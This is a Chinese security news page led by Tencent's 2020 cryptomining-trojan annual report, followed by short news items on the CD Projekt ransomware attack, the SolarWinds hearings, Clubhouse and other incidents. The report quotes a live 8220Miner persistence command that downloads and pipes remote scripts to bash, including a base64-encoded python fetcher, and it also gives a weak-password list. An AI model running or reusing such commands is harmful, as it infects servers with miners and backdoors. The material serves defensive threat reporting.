标签: 网络安全

腾讯安全发布《 2020 挖矿木马年度报告》:比特币涨 10 倍、门罗币涨 6 倍,挖矿木马同步增长

一、摘要 2020年各类数字加密货币价格迎来暴涨,比特币价格一度超过5万美元/BTC,市值达到9200亿美元,是2019年底的10倍之多,达到了历史最高点。同期挖矿木马最偏好的门罗币价格也同步增长6倍,这意味着黑客通过进行门罗币挖矿,兑现后收益可达到以往收益的6倍。 在如此大利益诱惑之下,黑产团伙已闻风而动,纷纷加入了对主机计算资源的争夺。一个典型现象就是,有大量挖矿木马在运行时,会尝试清除竞争对手木马。 门罗币价格曲线(数据来源:coinmarketcap.com) 根据腾讯安全威胁情报中心的检测数据,2020年挖矿木马上升趋势十分明显。 2020年挖矿木马增长趋势 本报告以腾讯安全产品获取的安全事件告警工单数据为基础,统计分析得出2020年挖矿木马的活跃家族TOP榜,从挖矿木马主要入侵特点、漏洞利用偏好、持久化运行手段等方面展示其主要威胁,预测未来挖矿木马攻击可能呈现的新趋势,给政企机构安全运维团队提供常见挖矿木马的防御清理建议。 二、挖矿木马风险 1.1 挖矿家族TOP榜 2020年度挖矿木马家族排名前三的分别为DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner,榜单中有通过永恒之蓝漏洞传播的为DTLMiner、NSABuffMiner、NSAGluptebaMiner,有利用Redis、Hadoop、Weblogic、Drupal、thinkphp等应用程序漏洞传播的为H2Miner、GuardMiner、z0Miner、8220Miner等家族,以及主要通过弱口令爆破进行传播的为KoiMiner家族。 1.2 挖矿木马的危害 挖矿木马最容易被感知到的影响就是服务器性能会出现严重下降,从而影响服务器业务系统的正常运行,严重时可能出现业务系统中断或系统崩溃。如下图所示案例,H2Miner挖矿木马运行时占用了98%的CPU资源,系统性能已严重受损。 其次,挖矿木马威胁事件往往伴随着攻击者组建僵尸网络。感染挖矿木马的同时,服务器已成为黑客控制的肉鸡电脑,除了硬件资源被浪费,黑客还可能利用失陷主机对其他目标进行攻击,包括蠕虫式的横向攻击扩散、对特定目标进行DDoS攻击、作为黑客下一步攻击的跳板隐藏攻击者线索或攻击真实意图、将失陷主机作为分发木马的下载服务器或C2服务器等等。 第三,失陷主机可能造成信息泄露。攻击者入侵成功,很多情况下已获得服务器的完全权限,只要攻击者愿意,就可能盗取服务器数据,使受害企业面临信息泄露风险,攻击者也可能在服务器下载运行勒索病毒,随时可能给企业造成更加严重的破坏。 第四,攻击者入侵安装挖矿木马的同时,还可能在服务器安装后门、服务和计划任务,实现对失陷主机的稳固长期控制。腾讯安全专家分析发现,较多挖矿木马威胁事件发生后,攻击者会添加管理员用户、安装远程控制软件,以及为方便攻击者下次连接开放特定的网络端口。 鉴于以上这些危害,我们建议政企机构安全运维人员高度警惕挖矿木马感染事件,挖矿可能仅仅是攻击者制造危害的第一步,极可能处于黑客入侵后危害最轻的阶段。 2.挖矿木马入侵通道 2.1 利用漏洞攻击 远程代码执行漏洞(RCE)可以让远程攻击者直接向后台服务器远程注入操作系统命令或者恶意代码,从而控制后台系统,挖矿木马攻击时最常用的远程代码执行漏洞TOP统计如下: 在2020年挖矿木马最常利用的RCE漏洞排行榜里,WebLogic CVE-2019-2725高居榜首。 此外,还有各种未授权访问漏洞被攻击者利用。即需要安全配置或权限认证的地址、授权页面存在缺陷导致攻击者可以直接访问,从而引发敏感信息泄露或恶意代码执行。挖矿木马攻击时常用未授权访问漏洞列表如下: 未授权访问应用类型 开放默认端口 Redis 6379 Hadoop Yarn RESET API 8088 Docker Remote API 2375 Kubernetes 10255/10250 Jenkins 8080 XXL-JOB 9999 宝塔面板phpMyAdmin 888 Apache Flink Dashboard 8081 PostgreSQL 5342 典型案例 案例1:Z0Miner利用公开仅15天的高危漏洞攻击挖矿 腾讯安全团队于2020年11月2日发现挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)进行攻击,本次攻击距离Weblogic官方发布安全公告(2020.10.21)之后仅仅15天。 挖矿木马团伙对于新漏洞武器的采用速度之快,由此可见一斑。这一案例促使安全研究人员需要更快速的响应高危安全漏洞,当面临数量庞大的云主机高危漏洞需要修补时,对安全运维人员构成极大挑战。 案例2:redis服务器配置弱口令致SuperManMiner控制约万台主机挖矿 腾讯安全威胁情报中心检测到利用Redis未授权访问漏洞直接写入计划任务,下载用golang语言编写的挖矿木马下载器superman,根据挖矿算力推测该团伙已控制约1万台失陷系统进行门罗币挖矿。 在本例中,部分政企机构使用Redis时,由于没有对redis进行良好的配置,如使用空口令或者弱口令等,导致攻击者可以直接访问redis服务器,并可以通过该问题直接写入计划任务甚至可以直接拿到服务器权限。 案例3:RunMiner控制约1.6万台主机挖矿 腾讯主机安全(云镜)捕获RunMiner挖矿木马利用Apache Shiro反序列化漏洞(CVE-2016-4437)攻击云服务器。RunMiner挖矿团伙入侵成功后会执行命令反弹shell连接到C2服务器对肉鸡系统进行远程控制,然后继续下载执行Run.sh,下载XMRig挖矿木马tcpp进行门罗币挖矿,病毒通过安装定时任务进行持久化。 根据RunMiner挖矿木马使用的门罗币钱包算力(约268.6KH/s)推算,该挖矿团伙已控制约16000台服务器执行挖矿任务。在黑客控制的服务器上还发现多个扫描探测、网络入侵和远程控制工具,该团伙显然是专业黑灰产经营团伙之一。 2.2 爆破攻击 用户在设置系统登陆密码时,为了方便记忆往往采用默认的空口令或者非常简单的密码例如admin、root、test、111111、123456等,使用这些密码导致黑客可以轻易猜解并登陆,从而入侵系统,部分常见的弱密码如下: admin admin12 admin888 admin8 admin123 sysadmin adminxxx adminx root roots test test1 test123 test2 password aaaAAA111 888888 88888888 000000 00000000 111111 11111111 aaaaaa aaaaaaaa 135246 135246789 123456 许多挖矿木马在传播时也会针对系统的弱密码进行爆破攻击,根据腾讯安全2020年云上安全报告提供的数据,默认用户名、端口名被爆破攻击的次数达数十亿次之多。常被挖矿木马爆破攻击的服务类型包括SSH、Mssql、Redis等,各类型爆破攻击对应的挖矿家族如下: MS SQL 永恒之蓝下载器木马、GuardMiner 、MrbMiner、BasedMiner、贪吃蛇挖矿木马、快GO旷工 SSH爆破 永恒之蓝下载器木马、Ks3_Miner、LoggerMiner、8220Miner、DDG Redis爆破 永恒之蓝下载器木马、H2Miner、GuardMiner、DDG Msql爆破 Mykings 2.3 僵尸网络渠道 利用僵尸网络渠道分发成为挖矿木马越来越偏好的传播手段之一,挖矿木马自身也在组建僵尸网络。僵尸网络在分发安装挖矿木马的同时,还会下载持久化模块、远程控制模块、攻击传播模块、自动更新模块等多种恶意组件,以达到对已感染机器进行长久利用和控制的目的,已失陷的肉鸡系统又会成为新的攻击源,如此不断扩大僵尸网络的规模。 具有僵尸网络特征的挖矿木马TOP榜如下,其中前三位是DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner为老牌僵尸网络,由于控制该僵尸网络的幕后黑客团伙仍在不断更新其攻击方法,使其在出现后的数年里仍然保持很高的活跃度。 在2020年新活跃的挖矿木马家族以Linux服务器为攻击对象的居多,例如通过SSH弱口令攻击的Outlaw、Prometei,通过Docker Remote API漏洞入侵的TeamTNT,以及通过Nexus Repository Manager 3弱密码入侵,利用Mysql、Tomcat弱口令爆破,Weblogic远程代码执行漏洞进行横向扩散的Sysrv-hello家族等等。 典型案例 案例4:TeamTNT TeamTNT挖矿团伙通过批量扫描公网上开放2375端口的云服务器,并尝试利用Docker Remote API未授权访问漏洞对云服务器进行攻击。 TeamTNT在成功入侵云服务器后,会隐藏进程,通过安装定时任务持久化,并收集主机上的隐私数据(如主机用户名和密码、RSA登录凭证、AWS CLI跨账户授权信息、docker配置信息)上传到C2服务器。与此同时,为了控制更多肉鸡系统,增加挖矿收益,TeamTNT团伙还利用SSH复用连接进行横向移动以感染更多服务器。 案例5:Sysrv-hello 腾讯安全威胁情报中心检测到Sysrv-hello僵尸网络对云上Nexus Repository Manager 3存在默认帐号密码的服务器进行攻击。得手后再下载门罗币矿机程序挖矿,同时下载mysql、Tomcat弱口令爆破工具,Weblogic远程代码执行漏洞(CVE-2020-14882)攻击工具进行横向扩散。其攻击目标同时覆盖Linux和Windows操作系统。 案例6:Outlaw 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸网络的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,tsm32、tsm64负责继续SSH爆破攻击传播病毒。 3.挖矿木马持久化 入侵者攻击得逞之后,会通过各种技术手段安装后门、服务和定时任务,添加管理员帐户、开放网络端口,实现对失陷主机的持久控制。 3.1 Linux定时任务 WatchbogMiner通过多种方式创建定时任务,在指定的时间执行恶意代码: 1)通过写入文件创建 写入文件如下: /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 2)通过crontab命令创建 3)通过at命令创建 4)通过修改环境变量”/home/$me/.bashrc”、”/root/.bashrc”创建 3.2    Linux系统服务 1)WannaMine将恶意代码写入启动目录/etc/rc.d/init.d目录下,随系统启动执行。 2)8220Miner通过写入系统初始化脚本/etc/init.d/down,将恶意代码添加到启动项。 echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL hxxp://5.196.247.12/xms||wget -q -O- hxxp://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download hxxp://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3)Muhstik僵尸网络通过写入/etc/inittab,添加恶意程序到系统启动项。 4)4SHMiner通过安装服务/etc/init.d/c3pool_miner启动挖矿脚本。 5)4SHMiner4SHMiner通过安装服务/etc/systemd/system/moneroocean_miner.service启动挖矿脚本。 3.3    Windows WMI KingMiner使用WMI创建名为WindowsSystemUpdate_WMITimer的计时器,并将事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate _filter绑定到计时器,从而通过计时器每15分钟执行一次恶意脚本代码。 三、未来趋势 挖矿木马针对云上攻击增长较快,企业安全管理人员时刻面临新的挑战。黑灰产业对谋求非法利益的追求没有止境。受利益趋势,挖矿团伙对新漏洞武器的采用速度越来越快,这对防御方的安全响应能力提出了更高的要求。与此同时,众多网络组件的安全漏洞仍会源源不断涌现。 旧的挖矿僵尸网络依然活跃,新僵尸网络不断出现,模块化的、持续扩张、挖矿团伙跟僵尸网络相互勾结的情况日趋多见。这种复杂的安全态势使得政企机构难以采用单一技术方案防御和清除威胁。 四、安全建议 腾讯安全团队在20多年的安全实践中,逐步改进保护自身业务所采用的多层级安全解决方案,将安全威胁情报、主机云防火墙、云主机安全等一系列安全产品统一由安全运营中心(SOC)管控,构建多层次的纵深防御体系,全面阻断挖矿木马的攻击威胁。 腾讯安全全系列产品支持在挖矿木马、僵尸网络入侵攻击的各个环节进行检测、防御: 4.1 防御建议 1)建议政企机构运维人员对Linux服务器的SSH服务、Windows SQL Server等常用主机访问入口设置高强度的登录密码,以对抗弱口令爆破攻击。 推荐政企机构在终端部署腾讯云主机安全(云镜)产品,腾讯主机安全产品具有密码爆破拦截、异地登录提醒、木马文件查杀、高危漏洞检测等安全功能,可对云主机的Linux系统、Mysql、Tomcat等账号的弱口令进行检测。 2)对于Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres等应用增加授权验证,对访问对象进行控制。 3)如果服务器部署了Weblogic、Apache Struts、Apache Flink、ThinkPHP等经常曝出高危漏洞的服务器组件,应及时将其更新到最新版本,并且实时关注组件官方网站和各大安全厂商发出的安全公告,根据提示修复相关漏洞。 推荐政企机构在网络边界部署腾讯云防火墙产品,腾讯云防火墙基于网络流量进行威胁检测与主动拦截,腾讯安全团队会及时响应最流行的高危漏洞利用,快速发布检测规则,使用虚拟补丁技术有效阻断挖矿木马入侵时利用的各类高危漏洞。 4.2 清理建议 政企机构运维人员可以使用腾讯主机安全产品检测清除入侵服务器的各种木马,根据主机安全木马查杀告警信息的指引彻底清除病毒木马。 在日常运维中,系统管理员可注意以下内容: 1)检查有无占用CPU资源接近甚至超过100%的进程,如有找到进程对应文件,确认是否属于挖矿木马,Kill 挖矿木马进程并删除文件;kill 掉包含下载恶意shell脚本代码执行的进程; 2)检查/var/spool/cron/root、/var/spool/cron/crontabs/root等文件中有无恶意脚本下载命令,有无挖矿木马启动命令,并将其删除; 3)如有发现挖矿相关进程、恶意程序,及时对服务器存在的系统漏洞、弱口令、Web应用漏洞进行排查和修复。

《赛博朋克 2077 》开发商推迟发布补丁:黑客攻击导致开发瘫痪

2月25日CDPR官方在微博上宣布,《赛博朋克2077》1.2版更新内容将推迟发布。因为CDPR近期遭受网络攻击,并且1.2版本内容较多需更多时间打磨。预计新的发布时间为三月份的下半月。 尽管我们真切地想要在曾说明的时间内推出《赛博朋克 2077》的1.2 版本更新,但是由于工作室 IT 架构近期遭受网络攻击以及出于1.2 版本本身体量的考虑,我们需要更多时间。 我们为 1.2 版本设定的目标超出了之前的所有更新,它将为游戏各方面带来诸多改善和修复。为了确保这一点,我们还有更多工作要做。因此,我们预计新的发布时间为三月下半。 这并非我们希望分享给大家的消息,但我们需要更为妥善地发布此次版本更新。更多讯息将于届时带来。感谢您一如既往的耐心和支持。 目前《赛博朋克2077》最新的大型更新是1.1版本,主要对多方面的稳定性作出了改善。 据报道,2月24日,《赛博朋克2077》的开发商波兰“CD Projeckt”公司宣布,公司之前遭遇的黑客袭击干扰了游戏补丁包的开发工作,因此该游戏的补丁将会推迟到三月的“后半部分”发行。 这次黑客攻击发生在二月初,黑客攻破了CD Projeckt公司的内部信息系统,其中包括《赛博朋克2077》游戏的源代码。这对于该公司来说是屋漏偏逢连夜雨。之前,《赛博朋克2077》发布之后被爆出问题多多。 该公司在推特官方账号上表示,公司很希望在之前公布的时间段内推出《赛博朋友》1.2版补丁,然而公司IT基础设施遭遇的网络攻击,再加上游戏升级的工作量庞大,这意味着公司将无法按照原定时间发布补丁包,相关开发需要更多时间。 一月份,该公司已经针对《赛博朋克2077》游戏推出了一个补丁包,并且计划在二月份推出一个更大的补丁包。 “CD Projeckt”公司以“巫师”系列中世纪奇幻角色扮演游戏而闻名,这些游戏的成功也导致该公司股价大幅上涨,然而《赛博朋克2077》游戏发布之后出现的问题,导致股价在去年底下跌。 据报道,这一次黑客袭击属于“勒索式攻击”,黑客要求被攻击者支付赎金,除了《赛博朋友2077》游戏源代码之外,黑客还获取了公司员工个人隐私信息以及其他敏感数据。一些信息稍后曾经在网络上销售。 消息人士透露,面对这次勒索攻击,CD Projeckt公司拒绝支付赎金,这导致员工时至今日无法登录公司虚拟专用网,无法获取完成游戏开发的工具。 对于员工来说,这次攻击也是一次“噩梦”。黑客获取了大量员工个人信息,包括波兰身份号码、个人护照信息。公司要求员工紧急冻结个人银行账号,并且向政府机构以及相关银行报告了攻击事件。 另外,该公司还要求员工把个人电脑带到IT部门,检查是否被植入恶意软件或是其他入侵工具。 之前,由于游戏爆出质量问题,索尼公司采取了极端措施,将《赛博朋克2077》游戏从“PlayStation游戏商店”紧急撤架。而1.2版补丁被认为是解决问题的最重大补丁包,该公司表示:“我们对于1.2版补丁的开发目标超过了之前所有的补丁。”       (消息及封面来源:新浪科技)

谷歌游说议员 拟利用 SolarWinds 听证会向微软施压

据报道,谷歌正在游说参议院情报委员会成员,准备利用“SolarWinds黑客攻击听证会”向微软施压,询问其产品是否存在网络安全漏洞,并在此次黑客攻击事件中发挥了作用。去年12月,从事网络安全管理软件制作的SolarWinds公司表示,其安全防护软件遭黑客攻击。黑客还借助这款软件的后门,攻击了大量美国公司、政府部门,其中微软公司也受到了攻击。 SolarWinds称,黑客最初是通过微软Office 365服务中的漏洞进入其系统的。而微软则强烈否认了这一点。但微软承认,黑客获取了其部分产品的源代码,并审查了与这些产品相关的代码。 该事件曝光后,在过去的两个月里,微软因其产品在散布黑客网络中所扮演的角色而面临严格审查。 周一,谷歌向议员们提供了一份十多个问题的清单,一名参议院助手表示,这些问题旨在审查微软产品的安全性,如Windows 10、Azure和Office 365。 分析人士称,谷歌的这一举动,也是科技巨头利用政治几乎相互削弱的最新例证。微软自己也使用过这种策略:去年,微软总裁布拉德·史密斯(Brad Smith)曾呼吁各国政府,加强对苹果和谷歌运营应用商店的方式,进行反垄断调查。此外,就在本周,微软还公开支持在欧洲推动谷歌等公司为新闻链接付费。 目前尚不清楚,这个由16名成员组成的小组中的每一位议员是否都收到了谷歌的问题清单。         (消息及封面来源:cnBeta)

微软与 FireEye 敦促国会制定强制性的安全报告披露规则

在调查发现 SolarWinds 黑客攻击事件对美国企业和联邦政府有着极其深远的影响之后,微软和 FireEye 高管于本周二联合敦促国会采取行动,以制定强制性的安全报告披露规则。微软总裁 Brad Smith 在提交给参议院情报委员会的文书中表示:“我们需要让私营机构承担明确、一致的披露义务,否则企业会在遭受黑客入侵时纷纷保持沉默”。 显然,作为 SolarWinds 入侵事件的余波,安全行业对当下的糟糕状况感到十分无奈,因而 Brad Smith 认为大家是时候做出集体的转变。 我们需要用明确、一致性的义务,来代替这种可怕的沉默。只有这样,私营组织才会在遭受到重大事件影响时及时披露信息。 曾因参与早期调查而受到赞誉的 FireEye 首席执行官 Kevin Mandia 补充道: 企业应该有一种方法来披露可能对国家安全造成重大影响的安全公告,而不必担心因此而受到法律的制裁。 与此同时,美国政府应考虑制定一个联邦层面的披露方案。除了分享威胁情报,还应通报与黑客攻击 / 入侵事件相关的细节。 FireEye 指出,去年 12 月,拥有复杂背景的黑客组织成功利用了 SolarWinds 的软件漏洞,渗透了多达 1.8 万名客户的内部网络,其中就包括 FireEye 和微软。 某位白宫官员在上周表示,在长达数月的行动期间,其已证实有 9 个联邦机构和 100 家私营实体受到了 SolarWinds 黑客事件的影响,且情报官员直指攻击者与俄方有关。 Kevin Mandia 和 Brad Smith 指出:“遗憾的是,按照现行的法律,相关企业并不需要主动公开披露黑客攻击事件”。 “虽然法律上没有提出举报和披露的义务,但我们认为这么做仍然很有必要。 除了保障每位客户的权益,还有助于维护联邦政府的安全。 如果没有这方面的信息披露与共享,那我们就无法确保这个国家的安全。” 据悉,虽然目前全美多州已明确规定要以某种形式披露安全公告,但在经历了多年的拉扯之后,联邦政府仍未能将此事摆上重要的日程。 参议院情报委员会主席 Mark Warner 周二表示:“我们可能等到有意披露的机构,但也可能对黑客攻击事件毫不知情。就算其它大型企业也可能成为受害者,但就是没人选择挺身而出”。 基于此,Mark Warner 认为越来越有必要制定一套强制性的安全公告和信息共享披露制度,并且建议在联邦层级上做出相应的努力。           (消息及封面来源:cnBeta)

美众议院将举办 SolarWinds 黑客攻击听证会

据外媒CNET报道,美众议院国土安全委员会和监督与改革委员会于当地时间周一宣布,他们将于本周就SolarWinds遭黑客攻击一事举行听证会。在2月26日的听证会上,SolarWinds CEO Sudhakar Ramakrishna、前SolarWinds CEO Kevin Thompson、微软总裁布拉德·史密斯和FireEye CEO Kevin Mandia都将出庭作证。 听证会将对私营公司在预防、调查和补救影响政府并对国家安全造成损害的网络攻击方面的作用展开调查。 此前,美情报机构曾在1月初将发生在去年的SolarWinds黑客事件归咎于俄罗斯。 据悉,该黑客攻击始于2020年3月左右,当时黑客侵入了总部位于德克萨斯州的SolarWinds的IT管理软件。黑客在SolarWinds的软件更新中植入了恶意代码,该公司约1.8万名私人和公共部门客户安装了受病毒感染的更新。 据报道,此次入侵包括美财政部高层使用的电子邮件系统。相关政府官员已经证实,美国财政部、能源部和商务部都遭遇了黑客入侵。据报道,此次黑客攻击的目标还波及到美国土安全部、五角大楼、国务院、国家卫生研究院和国家核安全局。 这场名为Weathering the Storm: The Role of Private Tech in the SolarWinds Breach and Ongoing Campaign的听证会将于美国东部时间2月26日上午9点开始。         (消息及封面来源:cnBeta)

iOS 14.5 将引入更高安全系数的补丁修复

几位恶意软件研究人员宣称,iOS 14.5 中即将引入的一项改动,将使得在 iPhone 上执行“零点击”(Zero Click)漏洞利用变得更加困难。据悉,苹果悄然改变了在 iOS 14.5 Beta 测试版本上的代码运行方式,更多细节有望在下一次公开推送时披露。 具体说来是,该公司添加了指针验证码(PAC),以保护用户免受通过内存破坏来注入恶意代码的攻击。 在调用之前,系统将会验证所谓的 ISA 指针,后者是一种告知 iOS 程序要运行什么代码的安全特性。 一位研究人员指出,其在 2 月初的反向工程工作期间,发现了 iOS 14.5 Beta 测试版本中引入的这项新变化。 与此同时,苹果还在 2 月 28 日公开发布的新版《平台安全性指南》中分享了有关 PAC 的一些细节。 研究人员向 Motherboard 表示,这项安全性缓解措施,将使得零点击漏洞的利用过程变得更加难以实现。 这类攻击特指攻击者无需用户进行任何干预,即可对 iPhone 发起入侵,甚至通过复杂的技术手段,从 iOS 内置隔离的沙盒安全机制中逃逸。 苹果发言人亦在接受外媒采访时称,该公司相信这项改变将使得零点击漏洞攻击变得更加难以实现,但也补充道,设备安全性并不取决于单一的缓解策略,而是需要借助一系列的组合拳。 安全研究人员表示,尽管不能完全排除,但新措施可以提升相关标准,让此类攻击的利用成本大幅提升。 在此之前,零点击漏洞已被用于针对 iPhone 用户的几次引人注目的攻击。比如 2016 年的时候,阿联酋方面就利用名为 Karma 的黑客工具,侵入了数百部的 iPhone 。 此外 2020 年的一份报告表明,零点击漏洞被用于监视 37 名记者的 iPhone,且谷歌 Project Zero 安全团队还发现了其它潜在的零点击攻击漏洞。       (消息及封面来源:cnBeta)

CD Projekt Red 引用 DMCA 扼杀链接被盗游戏数据的 Twitter 账户

CD Projekt Red是一家电子游戏开发商,其代表作品是2020年争议巨大的电子游戏之一《赛博朋克2077》。那款游戏非常令人期待,但推出后却出现了巨大的问题,以至于变成了其开发商的累赘,并激怒了全球等待多年才能玩到这款游戏的玩家。该公司不久前宣布,黑客进入了其服务器,并窃取了网上泄露的游戏数据。 正如你所预料的那样,已经有一些用户通过Twitter和其他社交网络链接到这些被盗数据。据报道,CD Projekt Red一直在使用DMCA的移除请求来消除链接到该被盗数据的推文甚至账户。报道指出,上周四,至少有两名Twitter用户通过一家版权监测公司的电子邮件收到了DMCA移除请求的通知。 报道指出,邮件中列出了对侵权行为的描述,包括链接到非法获取源代码的《Gwent: The Witcher Card Game》的源代码,公司认为他说,该链接导致了一个便利的入口,让其他人下载源代码。 DMCA取缔通知的目标还有至少其他三个Twitter用户。他们的推文被一条标准的Twitter DMCA提示消息所取代,指出内容已被删除,以回应版权持有人的报告。CD Projekt Red上周宣布被黑客攻击,并发布了一张黑客要求的赎金截图。 游戏开发商拒绝与黑客合作,也没有支付赎金。据报道,黑客正试图出售他们在攻击中获得的其他数据。         (消息及封面来源:cnBeta)

Clubhouse 音频数据遭泄露

2月22日上午消息,据报道,广受欢迎的音频聊天室应用Clubhouse曾表示将采取措施确保用户数据不会被恶意黑客或间谍窃取。然而现在,至少有一名网络攻击者证明了Clubhous平台的实时音频是可以被窃取的。 Clubhouse发言人瑞玛·巴纳西(Reema Bahnasy)表示,本周末,一位身份不明的用户能够将Clubhouse的音频从“多个房间”传送到他们自己的第三方网站上。 虽然Clubhouse公司表示将“永久禁止”这一用户,并配备了新的“安全措施”以防止此类事件再次出现。但仍有研究人员认为,Clubhouse平台可能永远无法兑现这样的承诺。 2月13日,斯坦福互联网天文台(Stanford Internet Observatory)首次公开提出了Clubhouse的安全问题。该机构周日晚些时候表示,使用这款只有受邀才能使用的iOS应用程序的用户应假定所有对话都会被录音。 Facebook公司前安全主管、SIO现任主管亚历克斯·斯塔莫斯(Alex Stamos)表示:“Clubhouse不能为发生在世界各地的任何一场谈话提供任何隐私承诺。” 斯塔莫斯和他的团队还证实,Clubhouse依靠一家总部位于上海的初创公司Agora Inc.来处理其大部分后台业务。斯塔莫斯称,虽然Clubhouse公司主要负责用户体验,比如添加新朋友和寻找房间,但该平台的数据流量处理和音频制作服务仍然依赖这家中国公司。 斯塔莫斯称,Clubhouse对Agora的依赖引发了广泛的隐私担忧。Agora表示,它不能对Clubhouse的安全或隐私协议发表评论,并坚称不会为任何客户“存储或共享个人身份信息”,Clubhouse只是其中之一。Agora公司表示:“我们致力于使我们的产品尽可能安全。” 上周末,网络安全专家注意到,有一些音频和元数据被从Clubhouse平台移到了另一个网站。位于澳大利亚堪培拉(Canberra, Australia)的Internet 2.0的首席执行官罗伯特·波特(Robert Potter)表示:“一个用户建立了一种与世界其他地方远程共享其登录信息的方法。真正的问题是,人们竟认为这些对话从来都是私密的。” 周末音频盗窃背后的幕后黑手围绕用于编译俱乐部会所应用程序的JavaScript工具包构建了自己的系统。斯塔莫斯认为,他们实际上是临时搭建了平台。SIO公开宣称尚未确定袭击者的来源或身份。 SIO的研究员杰克·凯布尔(Jack Cable)称,虽然Clubhouse拒绝解释究竟采取了哪些措施来防止类似的违规行为,但解决方案可能包括防止使用第三方应用程序访问聊天室音频而不实际进入聊天室,或者只是限制用户可以同时进入的聊天室数量。 最近,Clubhouse以10亿美元的估值融资了1亿美元。自1月中旬以来,Agora的股价已经飙升了150%以上,现在它的市值接近100亿美元。         (消息及封面来源:cnBeta)

手机位置信息可分析出隐私信息

在 iPhone 和某些 Android 机型中首次运行应用程序的时候,在使用位置数据之前需要征求你的许可。其中有个选项是只允许本次运行启用定位服务,而不是永久授权该应用程序。但这样严苛的地理位置策略并不意味着就能妥善保护你的数据,尤其在 Android 平台上。近日一项新研究揭示了如何仅从位置信息中就推断出可怕的额外数据量,并提出了处理应用程序可访问的位置数据的新方法,从而更好地保护个人隐私。 来自意大利博洛尼亚大学的 Mirco Musolesi 以及来自英国伦敦大学学院的 Benjamin Baron 两位安全研究专家试图确认通过位置追踪能够收集多少用户个人信息。他们为此开发了一款名为 TrackAdvisor 的应用程序,安装在 69 名用户的设备上。该应用在每台设备上运行了至少两周,追踪了超过 20 万个地点。 该应用识别了大约 2500 个地点,并收集了 5000 条与人口统计学和个性有关的个人信息。TrackAdvisor 只需查看收集到的位置信息,就能推断出志愿者的健康状况、社会经济状况、种族和宗教信仰等数据。这就是用户会认为是敏感和隐私的数据。 Musolesi 在一份声明中说:“用户在很大程度上没有意识到他们授予应用程序和服务的一些权限对隐私的影响,特别是在涉及位置跟踪信息时。由于机器学习技术,这些数据提供了敏感信息,如用户居住的地方,他们的习惯,兴趣,人口统计学,以及用户的个性信息”。 作者表示,这是第一次广泛的研究,阐明了可以从位置跟踪中了解到什么样的信息。在新闻稿中写道:“因此,这项研究也表明了收集这些信息是如何代表侵犯用户隐私的”。研究人员表示,这样的研究可以为改进应用程序中的位置跟踪政策铺平道路,以更好地保护用户隐私。这将涉及更细化的隐私控制,允许用户选择哪些类型的位置信息不应该与应用程序共享。       (消息及封面来源:cnBeta)

红杉资本遭黑客攻击 数据或遭泄露

据报道,硅谷顶尖风险投资公司红杉资本周五对投资者表示,在它的一名雇员遭遇网络钓鱼攻击后,该公司的一些个人信息和财务信息可能已被第三方窃取。红杉对投资者表示,目前还没有迹象表明这些被窃信息在暗网上交易,或者遭到不法分子利用。 红杉资本发言人周六证实,该公司“最近经历了一起网络安全事件”,其安全团队正在调查的此事。该公司表示,他们已经上报给执法部门,并且在与外部网络安全专家合作处理此事。 红杉发言人说:“我们很遗憾这次事件已经发生,目前已经通知了受此影响的个人。我们已经大举投资加强安全性,今后仍将继续应对不断发展的网络威胁。” 红杉的投资者被称作有限合伙人,通常包括大型金融机构、大学捐赠基金、私人家族理财室或主权财富基金,但风险投资公司很少会公开分享投资者的信息。 根据Pitchbook的数据,红杉资本是硅谷最老牌、最成功的风险投资公司之一,管理的资产超过380亿美元。这家拥有49年历史的风险投资公司已经投资了Airbnb、DoorDash和23andMe等公司。根据官网信息,它还投资了FireEye和Carbon Black等网络安全公司。 此次黑客入侵似乎与Solarwinds攻击无关,后者对FireEye构成较为严重的破坏,并对政府机构和微软等大型科技公司产生了影响。         (消息及封面来源:cnBeta)